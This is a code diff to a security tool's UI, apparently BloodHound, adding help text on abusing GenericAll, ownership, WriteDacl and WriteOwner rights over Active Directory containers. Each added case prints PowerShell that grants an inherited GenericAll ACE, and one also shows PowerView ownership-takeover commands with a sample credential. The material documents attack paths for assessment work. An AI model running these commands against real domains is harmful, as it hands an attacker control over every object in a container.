diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx index 5f414dc1d7..11ed587225 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx @@ -18,7 +18,15 @@ import { FC } from 'react'; import { Typography } from '@mui/material'; const Abuse: FC = () => { - return There is no abuse info related to this edge.; + return ( + <> + + Permissions on the parent of a child object may enable compromise of the child object through inherited + ACEs or linked GPOs. + + See the inbound edges on the parent object for details. + + ); }; export default Abuse; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx index 7a0a0a068b..f1d4c1b13b 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx @@ -25,9 +25,6 @@ const General: FC = ({ sourceName, sourceType, targetName, target {typeFormat(sourceType)} {sourceName} contains the {typeFormat(targetType)} {targetName}. - - GPOs linked to a container apply to all objects that are contained by the container. - ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx index 8b90d4e3f8..a3fe7b33c0 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx @@ -17,6 +17,7 @@ import { FC } from 'react'; import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; +import CodeController from '../CodeController/CodeController'; const WindowsAbuse: FC = ({ sourceName, @@ -699,6 +700,37 @@ const WindowsAbuse: FC = ); + case 'Container': + return ( + <> + + With full control of the container, you may add a new ACE on the container that will inherit + down to the objects under that container. + + This can be done with PowerShell: + + {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE" + $principalName = "principal" # SAM account name of principal + + # Find the certificate template + $template = [ADSI]"LDAP://$containerDN" + + # Construct the ACE + $account = New-Object System.Security.Principal.NTAccount($principalName) + $sid = $account.Translate([System.Security.Principal.SecurityIdentifier]) + $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule( + $sid, + [System.DirectoryServices.ActiveDirectoryRights]::GenericAll, + [System.Security.AccessControl.AccessControlType]::Allow, + [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents + ) + # Add the new ACE to the ACL + $acl = $template.psbase.ObjectSecurity + $acl.AddAccessRule($ace) + $template.psbase.CommitChanges()`} + + + ); case 'CertTemplate': return ( <> diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx index 37662c2154..49cadd9a4c 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx @@ -17,6 +17,7 @@ import { FC } from 'react'; import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; +import CodeController from '../CodeController/CodeController'; const WindowsAbuse: FC = ({ sourceName, @@ -921,6 +922,37 @@ const WindowsAbuse: FC = ); + case 'Container': + return ( + <> + + With ownership of the container object, you may grant yourself the GenericAll permission + inherited to child objects. + + This can be done with PowerShell: + + {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE" + $principalName = "principal" # SAM account name of principal + + # Find the certificate template + $template = [ADSI]"LDAP://$containerDN" + + # Construct the ACE + $account = New-Object System.Security.Principal.NTAccount($principalName) + $sid = $account.Translate([System.Security.Principal.SecurityIdentifier]) + $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule( + $sid, + [System.DirectoryServices.ActiveDirectoryRights]::GenericAll, + [System.Security.AccessControl.AccessControlType]::Allow, + [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents + ) + # Add the new ACE to the ACL + $acl = $template.psbase.ObjectSecurity + $acl.AddAccessRule($ace) + $template.psbase.CommitChanges()`} + + + ); case 'CertTemplate': return ( <> diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx index a779a5cb52..3bbd5e23d5 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx @@ -17,6 +17,7 @@ import { FC } from 'react'; import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; +import CodeController from '../CodeController/CodeController'; const WindowsAbuse: FC = ({ sourceName, @@ -864,6 +865,37 @@ const WindowsAbuse: FC = ); + case 'Container': + return ( + <> + + With WriteDacl on the container object, you may grant yourself the GenericAll permission + inherited to child objects. + + This can be done with PowerShell: + + {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE" + $principalName = "principal" # SAM account name of principal + + # Find the certificate template + $template = [ADSI]"LDAP://$containerDN" + + # Construct the ACE + $account = New-Object System.Security.Principal.NTAccount($principalName) + $sid = $account.Translate([System.Security.Principal.SecurityIdentifier]) + $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule( + $sid, + [System.DirectoryServices.ActiveDirectoryRights]::GenericAll, + [System.Security.AccessControl.AccessControlType]::Allow, + [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents + ) + # Add the new ACE to the ACL + $acl = $template.psbase.ObjectSecurity + $acl.AddAccessRule($ace) + $template.psbase.CommitChanges()`} + + + ); case 'CertTemplate': return ( <> diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx index cbeda9895e..0fbdf7bb87 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx @@ -17,6 +17,7 @@ import { FC } from 'react'; import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; +import CodeController from '../CodeController/CodeController'; const WindowsAbuse: FC = ({ sourceName, @@ -1019,6 +1020,60 @@ const WindowsAbuse: FC = ); + case 'Container': + return ( + <> + + To change the ownership of the object, you may use the Set-DomainObjectOwner function in + PowerView. + + + You may need to authenticate to the Domain Controller as{' '} + {sourceType === 'User' + ? `${sourceName} if you are not running a process as that user` + : `a member of ${sourceName} if you are not running a process as a member`} + . To do this in conjunction with Set-DomainObjectOwner, first create a PSCredential object + (these examples comes from the PowerView help documentation): + + + {"$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n" + + "$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)"} + + + Then, use Set-DomainObjectOwner, optionally specifying $Cred if you are not already running a + process as a member of (the group that holds this ACE): + + + {'Set-DomainObjectOwner -Credential $Cred -TargetIdentity dfm -OwnerIdentity harmj0y'} + + + Now with ownership of the container object, you may grant yourself the GenericAll permission + inherited to child objects. + + This can be done with PowerShell: + + {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE" + $principalName = "principal" # SAM account name of principal + + # Find the certificate template + $template = [ADSI]"LDAP://$containerDN" + + # Construct the ACE + $account = New-Object System.Security.Principal.NTAccount($principalName) + $sid = $account.Translate([System.Security.Principal.SecurityIdentifier]) + $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule( + $sid, + [System.DirectoryServices.ActiveDirectoryRights]::GenericAll, + [System.Security.AccessControl.AccessControlType]::Allow, + [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents + ) + # Add the new ACE to the ACL + $acl = $template.psbase.ObjectSecurity + $acl.AddAccessRule($ace) + $template.psbase.CommitChanges()`} + + + ); case 'CertTemplate': return ( <>